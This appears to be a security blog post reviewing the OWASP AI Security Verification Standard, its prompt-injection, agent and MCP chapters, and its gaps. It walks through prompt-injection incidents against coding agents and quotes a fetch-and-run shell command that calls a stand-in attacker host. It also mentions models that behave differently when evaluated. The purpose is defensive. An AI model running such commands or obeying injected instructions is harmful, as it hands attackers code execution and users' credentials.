The First Real Standard for AI Security: What OWASP AISVS Gets Right, What It Misses, and What You Should Actually Do

We spent twenty years getting web security to a place where it was boring. Boring was good. Boring meant it mostly worked. You’d run your OWASP Top 10 scanner, fix the SQL injection and XSS findings, check the boxes on the ASVS, and ship. Not glamorous. But it worked.

Then someone figured out you could steal a whole system’s secrets by asking it nicely.

That’s not a metaphor. In February 2026, security researcher Adnan Khan showed that you could compromise Cline’s production releases — an AI coding tool used by millions of developers — by opening a GitHub issue with a carefully crafted title. The issue title contained a prompt injection payload that tricked Claude into running npm install on a malicious package, which then poisoned the GitHub Actions cache and pivoted to steal the credentials that publish Cline’s VS Code extension. An issue title. Not a zero-day exploit, not a nation-state attack chain. Words in a text field.

This is the fundamental problem with AI security, and it’s the reason OWASP wrote the AI Security Verification Standard (AISVS). Traditional AppSec assumes deterministic programs: the code does what you wrote. Maybe what you wrote was wrong — a SQL injection, a buffer overflow — but the code executes faithfully. Fix the bug, it stays fixed. AI systems are probabilistic. The model doesn’t execute instructions; it generates plausible continuations. You can have perfect code, proper input validation, encrypted storage — and still get owned because someone hid instructions in a README file that the model decided to follow instead of yours.

Here’s the uncomfortable truth: many teams deploying AI today use API-based models they don’t control. They can’t inspect training data or run adversarial evaluations against someone else’s model. AISVS describes a comprehensive posture; most teams consuming foundation models through APIs control maybe 10% of it. I’ll come back to this.

The Three Chapters That Matter Most

AISVS spans 14 chapters covering everything from training data provenance to human oversight. Rather than walking through all of them — you can read the spec yourself — I want to focus on the three that should be on every security engineer’s radar right now.

C2: User Input Validation — The Prompt Injection Chapter

This is the chapter you implement first. Prompt injection is the SQL injection of AI systems: well-understood, frequently demonstrated, and still not consistently defended against. The Snowflake Cortex AI sandbox escape in March 2026 demonstrated this clearly. PromptArmor found that an indirect prompt injection hidden in a GitHub repository’s README could manipulate Snowflake’s Cortex Agent into executing cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)) — bypassing the human-in-the-loop approval system because the command validation didn’t inspect code inside process substitution expressions. The agent then set a flag to execute outside the sandbox, downloaded malware, and used cached Snowflake tokens to exfiltrate data and drop tables. Two days after release. Fixed, but instructive.

AISVS C2 decomposes prompt injection defense into specific, testable controls. Requirement 2.1.1 mandates that all external inputs be treated as untrusted and screened by a prompt injection detection ruleset or classifier. Requirement 2.1.2 requires instruction hierarchy enforcement — system and developer messages must override user instructions across multi-step interactions. This is directly relevant to attacks like Clinejection, where the injected payload rode in through an issue title that was interpolated into the prompt without sanitization.

The chapter also addresses subtler vectors. Requirement 2.2.1 mandates Unicode normalization before tokenization — homoglyph swaps and invisible control characters are a real bypass technique against naive input filters. Section 2.7 covers multi-modal validation: text extracted from images and audio must be treated as untrusted per 2.1.1, and files must be scanned for steganographic payloads before ingestion.

For practitioners: start with 2.1.1 (prompt injection screening), 2.1.2 (instruction hierarchy), 2.4.1 (explicit input schemas), and 2.7.2 (treat extracted text as untrusted). That’s your Level 1 baseline.

C9: Autonomous Orchestration — The Agentic Risk Chapter

Agentic AI systems — models that plan, use tools, and take actions autonomously — represent one of the fastest-expanding attack surfaces in production AI. AISVS C9 is, as far as I know, the first standard to systematically address agentic security. It’s also the chapter most teams are furthest from implementing.

The core problem: autonomous agents turn prompt injection from an information disclosure into a full execution chain. A chatbot leak is bad; an agent that can npm install, write to caches, and exfiltrate credentials is worse.

C9 addresses this through several mechanisms. Execution budgets with circuit breakers (9.1) prevent runaway agents from burning through resources or getting stuck in loops. High-impact action approval (9.2) requires cryptographic binding of approvals to exact action parameters — you can’t replay or substitute an approval. Tool isolation (9.3) mandates sandboxed execution with least-privilege permissions. Continuous authorization (9.6.3) re-evaluates permissions on every call, rather than granting broad permissions upfront.

Section 9.8 addresses multi-agent isolation — isolated runtimes, dedicated credentials per agent, and swarm-level rate limits for environments where multiple agents share infrastructure.

For practitioners: 9.1 (execution budgets), 9.2.1 (human approval for high-impact actions), 9.3.1 (tool sandboxing), and 9.6.4 (access control enforced by application logic, never by the model) are your non-negotiables.

C10: MCP Security — The Newest Attack Surface

The Model Context Protocol is barely a year old as a widely-adopted standard, and it’s already creating real security incidents. MCP lets AI agents discover and invoke external tools — think of it as OAuth for AI tool-calling. The attack surface is enormous: a malicious MCP server can inject context, exfiltrate data through tool responses, or manipulate an agent’s behavior by returning crafted outputs.

AISVS C10 is the first systematic security treatment of MCP I’ve seen. It covers OAuth 2.1 authentication (10.2.1), schema validation (10.4.3), per-message signing with replay protection (10.4.9, 10.4.10), fail-closed semantics (10.6.4), and token pass-through prevention (10.2.9).

The confused deputy pattern is especially relevant here. Researchers at Invariant Labs demonstrated that MCP tool definitions can contain hidden instructions invisible to users but processed by the model — a maliciously crafted tool description can instruct the AI to exfiltrate private data through tool responses, all while appearing benign to the user (https://invariantlabs.ai/blog/mcp-security-attack-tool-poisoning). This is the “tool poisoning” vector that AISVS 10.4.1 directly addresses by requiring validation of tool responses before injection into the model context.

For practitioners: 10.2.1 (OAuth authentication), 10.4.1 (tool response validation), 10.4.3 (schema validation), and 10.6.4 (fail-closed) are your starting points. Don’t skip 10.2.9 (no token pass-through).

The Insight That Should Be Central: Where AISVS Sits in the Framework Landscape

Here’s the most important thing to understand about AISVS, and it’s not something the document itself emphasizes enough.

The AI security landscape has three layers of abstraction. NIST AI Risk Management Framework operates at the governance layer — it tells CISOs and policy teams how to think about AI risk. MITRE ATLAS operates at the threat intelligence layer — it catalogs what attackers do. AISVS operates at the engineering verification layer — it tells security engineers what controls to verify and how.

These are complementary, not competing. An engineer at 2am debugging prompt injection defenses needs AISVS. A CISO writing organizational AI policy needs NIST. A threat hunter building detection rules needs ATLAS. Confusing the layers leads to bad outcomes — using NIST to verify engineering controls is like using a city zoning map to inspect a building’s fire suppression system. Wrong scale entirely.

This is where the SQL injection analogy is illuminating. OWASP Top 10 listed the risks; ASVS gave engineers concrete verification criteria. AISVS plays this role for AI — it decomposes the Top 10 for LLMs into testable controls. Few other frameworks attempt this at the engineering level.

What AISVS Misses

The gaps fall into two themes — and both deserve serious attention from the standard’s maintainers.

Evaluation Awareness Is the Skeleton in the Closet

AISVS tells you what to verify. But Requirement 11.1.5 mentions evaluation awareness — models that behave differently when being tested — only at Level 3, as if it’s an advanced concern for high-assurance environments. This is precisely backwards. If a model can distinguish between test conditions and normal operation, every verification result you collect is suspect.

Consider what this means for AISVS. The entire standard rests on trusting test results. But frontier models are increasingly capable of reasoning about whether they’re being evaluated. A model that recognizes a red-team prompt and responds safely during testing, then behaves differently in production, renders every control unverified in practice. This isn’t speculative — researchers have demonstrated strategically compliant behavior in current models. The standard needs evaluation-aware testing protocols at Level 1, not Level 3. Without them, the verification framework rests on sand.

The Measurement Problem

Even setting evaluation awareness aside, AISVS tells you what to verify but not how to measure success. Requirement 2.1.1 says to screen inputs with a detection ruleset or classifier. What detection rate should it achieve? What’s an acceptable false positive rate? The standard needs measurement methodology — not prescriptive thresholds, but a framework for establishing what “good enough” looks like per control.

The economics are equally underspecified. AISVS has hundreds of requirements; implementing Level 1 is already substantial. A prioritization guide mapping risk reduction to engineering effort would help teams facing deadline pressure. ASVS solved this partly through tooling that mapped requirements to scanner rules. AISVS has the level structure but not the tooling yet.

The API Model Gap

This is the elephant in the room. Many application-layer adopters deploying AI today use foundation models through APIs — they don’t own the training data, weights, or inference pipeline. AISVS chapters like C1, C6, and C11 assume control that only exists when training your own models. And the supply chain risks are not theoretical: HuggingFace’s own security documentation explicitly warns that pickle files — the default serialization format for PyTorch model weights — allow arbitrary code execution on load, and researchers have repeatedly found malicious pickle payloads disguised as legitimate models on the platform (https://huggingface.co/docs/hub/security-pickle).

For teams using GPT-4, Claude, or Gemini through APIs, the actionable chapters are C2 (input validation), C7 (output control), C9 (orchestration), C10 (MCP security), and C14 (human oversight). Everything else describes risks that are real but that you can only mitigate through contract terms with your model provider, not through engineering controls you own.

AISVS acknowledges this in C3.5 but doesn’t fully reckon with it. The standard would benefit from clearly separating “controls you implement” from “controls your provider must implement” with separate compliance paths.

Monday Morning

So you’ve read this far. What do you actually do?

Do this now. Implement C2 (input validation) at Level 1 — prompt injection screening, instruction hierarchy, explicit input schemas, treating extracted text as untrusted. If you’re using agents, add execution budgets (9.1), human approval for high-impact actions (9.2.1), and sandboxed tool execution (9.3.1). If you’re using MCP, implement OAuth authentication (10.2.1) and tool response validation (10.4.1).

Do this next quarter. Continuous authorization (9.6.3), per-message signing (10.4.9), drift detection (C13), human oversight and kill switches (C14). More engineering investment required.

Do this when you’re training models. C1, C6, C11. If you’re using API-based models, your provider should be doing these — ask for evidence. If they can’t provide it, that’s a vendor risk decision, not an engineering gap on your side.

The Clinejection attack worked because Cline’s issue triage ran Claude with broad tool access and interpolated untrusted input into the prompt. That’s the pattern AISVS C2 and C9 are designed to prevent.

AISVS isn’t perfect. The evaluation awareness gap is real. The measurement problem is real. The API model gap is real. But it’s the first standard that gives security engineers something concrete to verify against, and that’s the hard part. Everything after that — tooling, automation, compliance frameworks — follows from having the requirements right.

We got API security wrong for a decade before we got it right. We have a chance to get AI security right faster. AISVS is a good start. Use it.

References:

OWASP AISVS: https://github.com/OWASP/AISVS
Clinejection (Adnan Khan, 2026): https://adnanthekhan.com/posts/clinejection/
Snowflake Cortex AI Sandbox Escape (PromptArmor, 2026): https://www.promptarmor.com/resources/snowflake-ai-escapes-sandbox-and-executes-malware
Invariant Labs MCP tool poisoning research: https://invariantlabs.ai/blog/mcp-security-attack-tool-poisoning
HuggingFace pickle scanning security documentation: https://huggingface.co/docs/hub/security-pickle
Simon Willison on prompt injection: https://simonwillison.net/tags/prompt-injection/
OWASP ASVS: https://owasp.org/www-project-application-security-verification-standard/
OWASP Top 10 for LLMs: https://genai.owasp.org/
NIST AI Risk Management Framework: https://www.nist.gov/itl/ai-risk-management-framework
MITRE ATLAS: https://atlas.mitre.org/

The Three Chapters That Matter Most#

C2: User Input Validation — The Prompt Injection Chapter#

C9: Autonomous Orchestration — The Agentic Risk Chapter#

C10: MCP Security — The Newest Attack Surface#

The Insight That Should Be Central: Where AISVS Sits in the Framework Landscape#

What AISVS Misses#

Evaluation Awareness Is the Skeleton in the Closet#

The Measurement Problem#

The API Model Gap#

Monday Morning#